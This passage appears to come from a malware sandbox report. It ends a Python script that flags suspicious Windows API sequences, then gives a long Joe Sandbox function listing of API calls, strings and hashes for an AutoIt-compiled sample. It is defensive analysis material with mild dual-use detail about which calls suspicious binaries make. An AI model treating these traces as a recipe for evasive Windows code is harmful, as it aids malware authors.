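        reasons = [WATCHLIST[a] for a in dict.fromkeys(apis) if a in WATCHLIST]
        reasons += [why for pattern, why in SEQUENCES if has_subsequence(apis, pattern)]
        if reasons:
            hits.append(Hit(rec.api_id, rec.opcode_id, reasons))
    return hits

if __name__ == "__main__":
    for h in flag_records(parse_records(SAMPLE)):
        print(h.api_id, h.opcode_id[:12], "->", "; ".join(h.reasons))
```

Run as a script it prints three hits (the device-I/O, token-SID and CreateProcessW functions) and stays silent on the SendMessageW record. To apply it to the full report, paste the function listing into a file and pass its contents to `parse_records`; because records are keyed by Opcode ID, duplicates across the report can be collapsed on that field before triage.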
                                                                        APIs
                                                                        • _memset.LIBCMT ref: 00EDE33D
                                                                        • _memset.LIBCMT ref: 00EDE34C
                                                                        • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000020,00000000,00000000,00F33D00,00F33D44), ref: 00EDE37B
                                                                        • CloseHandle.KERNEL32 ref: 00EDE38D
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1673381954.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                                                                        • Associated: 00000000.00000002.1673361876.0000000000E70000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1673440583.0000000000EFD000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1673440583.0000000000F1E000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1673474923.0000000000F2A000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1673488794.0000000000F34000.00000002.00000001.01000000.00000003.sdmp
                                                                        Similarity
                                                                        • API ID: _memset$CloseCreateHandleProcess
                                                                        • String ID:
                                                                        • API String ID: 3277943733-0
                                                                        APIs
                                                                          • Part of subcall function 00E8AF83: ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,?,00000000), ref: 00E8AFE3
                                                                          • Part of subcall function 00E8AF83: SelectObject.GDI32(?,00000000), ref: 00E8AFF2
                                                                          • Part of subcall function 00E8AF83: BeginPath.GDI32(?), ref: 00E8B009
                                                                          • Part of subcall function 00E8AF83: SelectObject.GDI32(?,00000000), ref: 00E8B033
                                                                        • MoveToEx.GDI32(00000000,00000000,?,00000000), ref: 00EDEA8E
                                                                        • LineTo.GDI32(00000000,?,?), ref: 00EDEA9B
                                                                        • EndPath.GDI32(00000000), ref: 00EDEAAB
                                                                        • StrokePath.GDI32(00000000), ref: 00EDEAB9
                                                                        Similarity
                                                                        • API ID: Path$ObjectSelect$BeginCreateLineMoveStroke
                                                                        • String ID:
                                                                        • API String ID: 1539411459-0
                                                                        APIs
                                                                        • SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,00000001), ref: 00EAC84A
                                                                        • GetWindowThreadProcessId.USER32(?,00000000), ref: 00EAC85D
                                                                        • GetCurrentThreadId.KERNEL32 ref: 00EAC864
                                                                        • AttachThreadInput.USER32(00000000), ref: 00EAC86B
                                                                        Similarity
                                                                        • API ID: Thread$AttachCurrentInputMessageProcessSendTimeoutWindow
                                                                        • String ID:
                                                                        • API String ID: 2710830443-0
                                                                        APIs
                                                                        • GetCurrentThread.KERNEL32 ref: 00EAB0D6
                                                                        • OpenThreadToken.ADVAPI32(00000000,?,?,?,00EAAC9D), ref: 00EAB0DD
                                                                        • GetCurrentProcess.KERNEL32(00000028,?,?,?,?,00EAAC9D), ref: 00EAB0EA
                                                                        • OpenProcessToken.ADVAPI32(00000000,?,?,?,00EAAC9D), ref: 00EAB0F1
                                                                        Similarity
                                                                        • API ID: CurrentOpenProcessThreadToken
                                                                        • String ID:
                                                                        • API String ID: 3974789173-0
                                                                        APIs
                                                                        • GetSysColor.USER32(00000008), ref: 00E8B496
                                                                        • SetTextColor.GDI32(?,000000FF), ref: 00E8B4A0
                                                                        • SetBkMode.GDI32(?,00000001), ref: 00E8B4B5
                                                                        • GetStockObject.GDI32(00000005), ref: 00E8B4BD
                                                                        • GetWindowDC.USER32(?,00000000), ref: 00EEDE2B
                                                                        • GetPixel.GDI32(00000000,00000000,00000000), ref: 00EEDE38
                                                                        • GetPixel.GDI32(00000000,?,00000000), ref: 00EEDE51
                                                                        • GetPixel.GDI32(00000000,00000000,?), ref: 00EEDE6A
                                                                        • GetPixel.GDI32(00000000,?,?), ref: 00EEDE8A
                                                                        • ReleaseDC.USER32(?,00000000), ref: 00EEDE95
                                                                        Similarity
                                                                        • API ID: Pixel$Color$ModeObjectReleaseStockTextWindow
                                                                        • String ID:
                                                                        • API String ID: 1946975507-0
                                                                        APIs
                                                                        • WaitForSingleObject.KERNEL32(?,000000FF), ref: 00EAB2DF
                                                                        • UnloadUserProfile.USERENV(?,?), ref: 00EAB2EB
                                                                        • CloseHandle.KERNEL32(?), ref: 00EAB2F4
                                                                        • CloseHandle.KERNEL32(?), ref: 00EAB2FC
                                                                          • Part of subcall function 00EAAB24: GetProcessHeap.KERNEL32(00000000,?,00EAA848), ref: 00EAAB2B
                                                                          • Part of subcall function 00EAAB24: HeapFree.KERNEL32(00000000), ref: 00EAAB32
                                                                        Similarity
                                                                        • API ID: CloseHandleHeap$FreeObjectProcessProfileSingleUnloadUserWait
                                                                        • String ID:
                                                                        • API String ID: 146765662-0
                                                                        APIs
                                                                        Similarity
                                                                        • API ID: CapsDesktopDeviceReleaseWindow
                                                                        • String ID:
                                                                        • API String ID: 2889604237-0
                                                                        APIs
                                                                        Similarity
                                                                        • API ID: CapsDesktopDeviceReleaseWindow
                                                                        • String ID:
                                                                        • API String ID: 2889604237-0
                                                                        APIs
                                                                        • OleSetContainedObject.OLE32(?,00000001), ref: 00EADEAA
                                                                        Strings
                                                                        Similarity
                                                                        • API ID: ContainedObject
                                                                        • String ID: AutoIt3GUI$Container
                                                                        • API String ID: 3565006973-3941886329
                                                                        APIs
                                                                          • Part of subcall function 00E8C6F4: _wcscpy.LIBCMT ref: 00E8C717
                                                                          • Part of subcall function 00E7936C: __swprintf.LIBCMT ref: 00E793AB
                                                                          • Part of subcall function 00E7936C: __itow.LIBCMT ref: 00E793DF
                                                                        • __wcsnicmp.LIBCMT ref: 00EBDEFD
                                                                        • WNetUseConnectionW.MPR(00000000,?,?,00000000,?,?,00000100,?), ref: 00EBDFC6
                                                                        Strings
                                                                        Similarity
                                                                        • API ID: Connection__itow__swprintf__wcsnicmp_wcscpy
                                                                        • String ID: LPT
                                                                        • API String ID: 3222508074-1350329615
                                                                        APIs
                                                                        Strings
                                                                        Similarity
                                                                        • API ID: _wcscpy
                                                                        • String ID: I/$I/
                                                                        • API String ID: 3048848545-2526233121
                                                                        APIs
                                                                        • Sleep.KERNEL32(00000000), ref: 00E8BCDA
                                                                        • GlobalMemoryStatusEx.KERNEL32 ref: 00E8BCF3
                                                                        Strings
                                                                        Similarity
                                                                        • API ID: GlobalMemorySleepStatus
                                                                        • String ID: @
                                                                        • API String ID: 2783356886-2766056989
                                                                        APIs
                                                                          • Part of subcall function 00E744ED: __fread_nolock.LIBCMT ref: 00E7450B
                                                                        • _wcscmp.LIBCMT ref: 00EBC65D
                                                                        • _wcscmp.LIBCMT ref: 00EBC670
                                                                        Strings
                                                                        Similarity
                                                                        • API ID: _wcscmp$__fread_nolock
                                                                        • String ID: FILE
                                                                        • API String ID: 4029003684-3121273764
                                                                        APIs
                                                                        • SendMessageW.USER32(?,00001132,00000000,?), ref: 00EDA85A
                                                                        • SendMessageW.USER32(?,00001105,00000000,00000000), ref: 00EDA86F
                                                                        Strings
                                                                        Similarity
                                                                        • API ID: MessageSend
                                                                        • String ID: '
                                                                        • API String ID: 3850602802-1997036262
                                                                        APIs
                                                                        • DestroyWindow.USER32(?,?,?,?), ref: 00ED980E
                                                                        • MoveWindow.USER32(?,?,?,?,?,00000001,?,?,?), ref: 00ED984A
                                                                        Strings
                                                                        Similarity
                                                                        • API ID: Window$DestroyMove
                                                                        • String ID: static
                                                                        • API String ID: 2139405536-2160076837
                                                                        APIs
                                                                        • _memset.LIBCMT ref: 00EB51C6
                                                                        • GetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 00EB5201
                                                                        Strings
                                                                        Similarity
                                                                        • API ID: InfoItemMenu_memset
                                                                        • String ID: 0
                                                                        • API String ID: 2223754486-4108050209
                                                                        APIs
                                                                        Strings
                                                                        Similarity
                                                                        • API ID: __snwprintf
                                                                        • String ID: , $$AUTOITCALLVARIABLE%d
                                                                        • API String ID: 2391506597-2584243854
                                                                        APIs
                                                                        • SendMessageW.USER32(00000000,00000143,00000000,?), ref: 00ED945C
                                                                        • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00ED9467
                                                                        Strings
                                                                        Similarity
                                                                        • API ID: MessageSend
                                                                        • String ID: Combobox
                                                                        • API String ID: 3850602802-2096851135
                                                                        APIs
                                                                          • Part of subcall function 00E8B34E: GetWindowLongW.USER32(?,000000EB), ref: 00E8B35F
                                                                        • GetActiveWindow.USER32 ref: 00EDDA7B
                                                                        • EnumChildWindows.USER32(?,00EDD75F,00000000), ref: 00EDDAF5
                                                                        Strings
                                                                        Similarity
                                                                        • API ID: Window$ActiveChildEnumLongWindows
                                                                        • String ID: T1
                                                                        • API String ID: 3814560230-924183305
                                                                        APIs
                                                                          • Part of subcall function 00E8D17C: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 00E8D1BA
                                                                          • Part of subcall function 00E8D17C: GetStockObject.GDI32(00000011), ref: 00E8D1CE
                                                                          • Part of subcall function 00E8D17C: SendMessageW.USER32(00000000,00000030,00000000), ref: 00E8D1D8
                                                                        • GetWindowRect.USER32(00000000,?), ref: 00ED9968
                                                                        • GetSysColor.USER32(00000012), ref: 00ED9982
                                                                        Strings
                                                                        Similarity
                                                                        • API ID: Window$ColorCreateMessageObjectRectSendStock
                                                                        • String ID: static
                                                                        • API String ID: 1983116058-2160076837
                                                                        APIs
                                                                        • GetWindowTextLengthW.USER32(00000000), ref: 00ED9699
                                                                        • SendMessageW.USER32(?,000000B1,00000000,00000000), ref: 00ED96A8
                                                                        Strings
                                                                        Similarity
                                                                        • API ID: LengthMessageSendTextWindow
                                                                        • String ID: edit
                                                                        • API String ID: 2978978980-2167791130
                                                                        APIs
                                                                        • _memset.LIBCMT ref: 00EB52D5
                                                                        • GetMenuItemInfoW.USER32(00000030,?,00000000,00000030), ref: 00EB52F4
                                                                        Strings
                                                                        Similarity
                                                                        • API ID: InfoItemMenu_memset
                                                                        • String ID: 0
                                                                        • API String ID: 2223754486-4108050209
                                                                        • Opcode ID: 05b6faed3f814971f4dfc9830c4d3617dda3146b7b7696f771410229886f1590
                                                                        • Instruction ID: 6b7e900c84865c6cda8097b877bd3ddc51a255b9f3dd016f45973de9fc5b804f
                                                                        • Opcode Fuzzy Hash: 05b6faed3f814971f4dfc9830c4d3617dda3146b7b7696f771410229886f1590
                                                                        • Instruction Fuzzy Hash: 2F11D073901715ABDB20DB98D904BDE77F9AB05768F081025E901F72A4D3B0AD05C790
                                                                        APIs
                                                                        • InternetOpenW.WININET(?,00000000,00000000,00000000,00000000), ref: 00EC4DF5
                                                                        • InternetSetOptionW.WININET(00000000,00000032,?,00000008), ref: 00EC4E1E
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1673381954.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                                                                        • Associated: 00000000.00000002.1673361876.0000000000E70000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1673440583.0000000000EFD000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1673440583.0000000000F1E000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1673474923.0000000000F2A000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1673488794.0000000000F34000.00000002.00000001.01000000.00000003.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_e70000_KSts9xW7qy.jbxd
                                                                        Similarity
                                                                        • API ID: Internet$OpenOption
                                                                        • String ID: <local>
                                                                        • API String ID: 942729171-4266983199
                                                                        • Opcode ID: 5017857d3267b88e50ebcb96a44afaa6eed5fd384d39bfdeb98ee337086bbe17
                                                                        • Instruction ID: dc090d9b34f3ffb7b21e003f298c61fada42c618533f248b9afdd919ba7fc204
                                                                        • Opcode Fuzzy Hash: 5017857d3267b88e50ebcb96a44afaa6eed5fd384d39bfdeb98ee337086bbe17
                                                                        • Instruction Fuzzy Hash: 1311C1B0100221BEDB259F518C94FFBFFA8FB06359F10811EF506A6080D2715842D6E0
                                                                        APIs
                                                                        • inet_addr.WSOCK32(00000000,00000000,?,?,?,00000000), ref: 00ECA84E
                                                                        • htons.WSOCK32(00000000,?,00000000), ref: 00ECA88B
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1673381954.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                                                                        • Associated: 00000000.00000002.1673361876.0000000000E70000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1673440583.0000000000EFD000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1673440583.0000000000F1E000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1673474923.0000000000F2A000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1673488794.0000000000F34000.00000002.00000001.01000000.00000003.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_e70000_KSts9xW7qy.jbxd
                                                                        Similarity
                                                                        • API ID: htonsinet_addr
                                                                        • String ID: 255.255.255.255
                                                                        • API String ID: 3832099526-2422070025
                                                                        • Opcode ID: 9ab4f6658d4023f69e8ade41431cde13135f6ae11341fe18e22fc0be537b53ea
                                                                        • Instruction ID: 3d017aad9c094e8ad1312d1d31f2b7b9eee27c30c6644dc6f714ed2d5a9be391
                                                                        • Opcode Fuzzy Hash: 9ab4f6658d4023f69e8ade41431cde13135f6ae11341fe18e22fc0be537b53ea
                                                                        • Instruction Fuzzy Hash: 6B012676200308ABCB24AF64C84AFADB3A4EF45718F20946AF515BB2D1C736E806C752
                                                                        APIs
                                                                        • SendMessageW.USER32(?,000001A2,000000FF,?), ref: 00EAB7EF
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1673381954.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                                                                        • Associated: 00000000.00000002.1673361876.0000000000E70000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1673440583.0000000000EFD000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1673440583.0000000000F1E000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1673474923.0000000000F2A000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1673488794.0000000000F34000.00000002.00000001.01000000.00000003.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_e70000_KSts9xW7qy.jbxd
                                                                        Similarity
                                                                        • API ID: MessageSend
                                                                        • String ID: ComboBox$ListBox
                                                                        • API String ID: 3850602802-1403004172
                                                                        • Opcode ID: 1954fc11929b2147216861495ffdd50859f141ff0e1896eee2e4df9d61cf3077
                                                                        • Instruction ID: 3cf833a1564123dfbcde0ded82c85abc84ea6b6ba489eff2763dbd8a73731aae
                                                                        • Opcode Fuzzy Hash: 1954fc11929b2147216861495ffdd50859f141ff0e1896eee2e4df9d61cf3077
                                                                        • Instruction Fuzzy Hash: 8B01D471A40114ABCB04EBA4CC529FE33AEFF4B350B14161DF466BB2D2EB7469089B91
                                                                        APIs
                                                                        • SendMessageW.USER32(?,00000180,00000000,?), ref: 00EAB6EB
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1673381954.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                                                                        • Associated: 00000000.00000002.1673361876.0000000000E70000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1673440583.0000000000EFD000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1673440583.0000000000F1E000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1673474923.0000000000F2A000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1673488794.0000000000F34000.00000002.00000001.01000000.00000003.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_e70000_KSts9xW7qy.jbxd
                                                                        Similarity
                                                                        • API ID: MessageSend
                                                                        • String ID: ComboBox$ListBox
                                                                        • API String ID: 3850602802-1403004172
                                                                        • Opcode ID: b2d4dc0f5a92445cc68653da8534cdc490eba81946292cef468421ab28ddf561
                                                                        • Instruction ID: a4632d7e333e5b7ff033890f5c8dda82d3ac13ab0f590d9fddae01754a7fed96
                                                                        • Opcode Fuzzy Hash: b2d4dc0f5a92445cc68653da8534cdc490eba81946292cef468421ab28ddf561
                                                                        • Instruction Fuzzy Hash: 8001A271A41004ABCB04EBA4CD52BFE73EDDF4B344F20101DB406B7182EB54AE189BB6
                                                                        APIs
                                                                        • SendMessageW.USER32(?,00000182,?,00000000), ref: 00EAB76C
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1673381954.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                                                                        • Associated: 00000000.00000002.1673361876.0000000000E70000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1673440583.0000000000EFD000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1673440583.0000000000F1E000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1673474923.0000000000F2A000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1673488794.0000000000F34000.00000002.00000001.01000000.00000003.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_e70000_KSts9xW7qy.jbxd
                                                                        Similarity
                                                                        • API ID: MessageSend
                                                                        • String ID: ComboBox$ListBox
                                                                        • API String ID: 3850602802-1403004172
                                                                        • Opcode ID: edb6e4cbc8d9f0a5df2795fb0bf2313e61c04b3558082a1f5bc532f9bb430ee8
                                                                        • Instruction ID: 53aa6faea9bb0fe64848be34647236c41e10c61227e8ffe61b08e0d0a8f406d7
                                                                        • Opcode Fuzzy Hash: edb6e4cbc8d9f0a5df2795fb0bf2313e61c04b3558082a1f5bc532f9bb430ee8
                                                                        • Instruction Fuzzy Hash: 7C01DB75640104BBCB00E7A4DD12EFE73ED9B0B344F50511DB406B7192EB546E1997B6
                                                                        APIs
                                                                        • LoadImageW.USER32(00E70000,00000063,00000001,00000010,00000010,00000000), ref: 00E74048
                                                                        • EnumResourceNamesW.KERNEL32(00000000,0000000E,00EB67E9,00000063,00000000,75C10280,?,?,00E73EE1,?,?,000000FF), ref: 00EE41B3
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1673381954.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                                                                        • Associated: 00000000.00000002.1673361876.0000000000E70000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1673440583.0000000000EFD000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1673440583.0000000000F1E000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1673474923.0000000000F2A000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1673488794.0000000000F34000.00000002.00000001.01000000.00000003.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_e70000_KSts9xW7qy.jbxd
                                                                        Similarity
                                                                        • API ID: EnumImageLoadNamesResource
                                                                        • String ID: >
                                                                        • API String ID: 1578290342-260571596
                                                                        • Opcode ID: 3ea19f5a16df0045e2f17e227afedb45d4eb94c13401cf9eb32a0b3fb4f484c7
                                                                        • Instruction ID: 9eaa2949fc3dec0334efc9f1324720611b97637740ab9dd4b29b2160d4c3be78
                                                                        • Opcode Fuzzy Hash: 3ea19f5a16df0045e2f17e227afedb45d4eb94c13401cf9eb32a0b3fb4f484c7
                                                                        • Instruction Fuzzy Hash: 47F090B1644318BBE7205B1ABC4AFD23EAEF745BB5F104106F714BA1E0D3F09480EA90
                                                                        APIs
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1673381954.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                                                                        • Associated: 00000000.00000002.1673361876.0000000000E70000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1673440583.0000000000EFD000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1673440583.0000000000F1E000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1673474923.0000000000F2A000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1673488794.0000000000F34000.00000002.00000001.01000000.00000003.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_e70000_KSts9xW7qy.jbxd
                                                                        Similarity
                                                                        • API ID: ClassName_wcscmp
                                                                        • String ID: #32770
                                                                        • API String ID: 2292705959-463685578
                                                                        • Opcode ID: f8b7b059953977d4d64d4914ef05aad0c3fd7c6b8ead80cdf55316b37d4ca39b
                                                                        • Instruction ID: 80a6884923d2739c0824d6e073f4720be3b29d612919238ffaab8e4132eaa8af
                                                                        • Opcode Fuzzy Hash: f8b7b059953977d4d64d4914ef05aad0c3fd7c6b8ead80cdf55316b37d4ca39b
                                                                        • Instruction Fuzzy Hash: 24E092776042292BDB10EAA6AC09ED7FFACAB91764F010056B905E3041D674E60587D0
                                                                        APIs
                                                                        • MessageBoxW.USER32(00000000,Error allocating memory.,AutoIt,00000010), ref: 00EAA63F
                                                                          • Part of subcall function 00E913F1: _doexit.LIBCMT ref: 00E913FB
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1673381954.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                                                                        • Associated: 00000000.00000002.1673361876.0000000000E70000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1673440583.0000000000EFD000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1673440583.0000000000F1E000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1673474923.0000000000F2A000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1673488794.0000000000F34000.00000002.00000001.01000000.00000003.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_e70000_KSts9xW7qy.jbxd
                                                                        Similarity
                                                                        • API ID: Message_doexit
                                                                        • String ID: AutoIt$Error allocating memory.
                                                                        • API String ID: 1993061046-4017498283
                                                                        • Opcode ID: f2c4bda5c8ead7f61300ea77ebec05f4dee21421d3c7f25827ce74d3e47c7c5e
                                                                        • Instruction ID: b45aac15f5bfce97fc99173b05e2b691eb4f2dd656f84487eb0b9432f677252e
                                                                        • Opcode Fuzzy Hash: f2c4bda5c8ead7f61300ea77ebec05f4dee21421d3c7f25827ce74d3e47c7c5e
                                                                        • Instruction Fuzzy Hash: 95D02B323C432833D21437D83C07FC4358C8B49B51F040065FB0CB51C24AD2DA8062DA
                                                                        APIs
                                                                        • GetSystemDirectoryW.KERNEL32(?), ref: 00EEACC0
                                                                        • FreeLibrary.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00000104), ref: 00EEAEBD
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1673381954.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                                                                        • Associated: 00000000.00000002.1673361876.0000000000E70000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1673440583.0000000000EFD000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1673440583.0000000000F1E000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1673474923.0000000000F2A000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1673488794.0000000000F34000.00000002.00000001.01000000.00000003.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_e70000_KSts9xW7qy.jbxd
                                                                        Similarity
                                                                        • API ID: DirectoryFreeLibrarySystem
                                                                        • String ID: WIN_XPe
                                                                        • API String ID: 510247158-3257408948
                                                                        • Opcode ID: 8a879ff2c89a10f639a42cb09253ec11c8e79c0db4c64d840466d6bfc2aa3a6e
                                                                        • Instruction ID: d6347c523cee66727208258c5f6e1c5cacde8e4de77bffa6eac23d6a47d7f107
                                                                        • Opcode Fuzzy Hash: 8a879ff2c89a10f639a42cb09253ec11c8e79c0db4c64d840466d6bfc2aa3a6e
                                                                        • Instruction Fuzzy Hash: 87E0E570C0454DDFDB11DBA6DD449ECF7B9AB88301F2890D9E116B2160D7705A45DF21
                                                                        APIs
                                                                        • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 00ED86E2
                                                                        • PostMessageW.USER32(00000000), ref: 00ED86E9
                                                                          • Part of subcall function 00EB7A58: Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?), ref: 00EB7AD0
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1673381954.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                                                                        • Associated: 00000000.00000002.1673361876.0000000000E70000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1673440583.0000000000EFD000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1673440583.0000000000F1E000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1673474923.0000000000F2A000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1673488794.0000000000F34000.00000002.00000001.01000000.00000003.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_e70000_KSts9xW7qy.jbxd
                                                                        Similarity
                                                                        • API ID: FindMessagePostSleepWindow
                                                                        • String ID: Shell_TrayWnd
                                                                        • API String ID: 529655941-2988720461
                                                                        • Opcode ID: ecacb562815edc095deae9510109f0b0a29b4bf8ae80cdb91f0cdd9b358ee00f
                                                                        • Instruction ID: 06b4424859e4d3540fa24c815bb84429353a26e70a70966d1b91eff85f6be84d
                                                                        • Opcode Fuzzy Hash: ecacb562815edc095deae9510109f0b0a29b4bf8ae80cdb91f0cdd9b358ee00f
                                                                        • Instruction Fuzzy Hash: D2D0A931388324ABE3646330AC0BFC67E089B84B20F000804B24AFA0C0C8A0E900C614
                                                                        APIs
                                                                        • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 00ED86A2
                                                                        • PostMessageW.USER32(00000000,00000111,00000197,00000000), ref: 00ED86B5
                                                                          • Part of subcall function 00EB7A58: Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?), ref: 00EB7AD0
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1673381954.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                                                                        • Associated: 00000000.00000002.1673361876.0000000000E70000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1673440583.0000000000EFD000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1673440583.0000000000F1E000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1673474923.0000000000F2A000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1673488794.0000000000F34000.00000002.00000001.01000000.00000003.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_e70000_KSts9xW7qy.jbxd
                                                                        Similarity
                                                                        • API ID: FindMessagePostSleepWindow
                                                                        • String ID: Shell_TrayWnd
                                                                        • API String ID: 529655941-2988720461
                                                                        • Opcode ID: f16b1bcecff74a57d5b6b7b0325559c374722f7a7ddbe18523be922265f7765d
                                                                        • Instruction ID: 4d71df5af04f2ba892592795e08d6c7b46fac427a24fb03e83a946b5d10064dd
                                                                        • Opcode Fuzzy Hash: f16b1bcecff74a57d5b6b7b0325559c374722f7a7ddbe18523be922265f7765d
                                                                        • Instruction Fuzzy Hash: 2ED01271398324BBE3646771AC0BFD77E599B84B21F110815B74AFA1D0C9F4E944C754